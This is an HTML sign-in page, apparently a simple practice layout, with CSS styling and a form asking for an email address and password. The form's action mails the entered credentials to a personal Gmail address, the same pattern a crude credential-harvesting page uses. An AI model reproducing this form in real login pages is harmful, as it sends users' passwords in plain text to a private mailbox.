<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Document</title>
    <style>
      body {
        background: #f5f5f5;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto,
          Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
        display: flex;
        justify-content: center;
        align-items: center;
      }
      form {
        width: 28vw;
        height: 50vh;

        text-align: center;
      }
      input {
        border: 1px solid #ced4da;
        border-radius: 5px;
        line-height: 1.5;
        padding: 0.5rem 0.7rem;
        transition: border-color 0.3s, box-shadow 0.3s;
        width: 28vw;
      }
      input:focus {
        border: 1px solid #86b7fe;
        box-shadow: 0 0 0 4px #b9d3fa;
        outline: 0;
      }
      .form-one {
        margin-bottom: 1rem;
      }
      button {
        background: #0d6efd;
        border: 1px solid #ced4da;
        width: 30vw;
        height: 3rem;
        border-radius: 10px;
        font-size: 15px;
        color: white;
      }
      .h22 {
        font-weight: 700;
        font-size: 30px;
      }
    </style>
  </head>
  <body>
    <form action="mailto:chibuikemichaelilonze@gmail.com" method="post">
      <div>
        <h2 class="h22">Please Sign in</h2>
      </div>
      <div class="form-one">
        <input
          type="email"
          name="email"
          id="email"
          placeholder="Email Address"
          minlength="17"
          maxlength="30"
          required
        />
      </div>
      <div class="form-one">
        <input
          type="password"
          name="password"
          id="password"
          placeholder="Password"
          minlength="8"
          maxlength="20"
          required
        />
      </div>
      <div class="form-one form-two">
        <input type="checkbox" name="checkbox" id="checkbox" />
        <label for="checkbox">Remember me</label>
      </div>
      <div><button type="submit">Sign in</button></div>
      <div><p>Copyright @2022</p></div>
    </form>
  </body>
</html>
